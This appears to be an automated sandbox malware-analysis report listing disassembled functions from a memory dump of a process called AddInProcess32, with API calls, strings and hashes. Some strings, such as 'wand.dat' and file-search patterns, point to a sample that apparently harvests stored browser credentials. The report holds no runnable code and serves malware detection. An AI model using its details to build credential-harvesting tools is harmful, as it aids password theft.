                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                  • API String ID: 3510742995-272990098
                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                  Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpymemset
                                                                                                  • String ID: gj
                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                  Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2241099983-0
                                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                  Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4053608372-0
                                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                  Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 4247780290-0
                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1471605966-0
                                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                  Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                  • String ID: \StringFileInfo\
                                                                                                  • API String ID: 102104167-2245444037
                                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                  Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                  • String ID: </%s>
                                                                                                  • API String ID: 3400436232-259020660
                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                  Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                  • String ID: MS Sans Serif
                                                                                                  • API String ID: 210187428-168460110
                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                  Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3384217055-0
                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                  Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$memcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 368790112-0
                                                                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                  Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3550944819-0
                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                  Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$free
                                                                                                  • String ID: g4@
                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                  Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: @
                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                  Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1127616056-0
                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
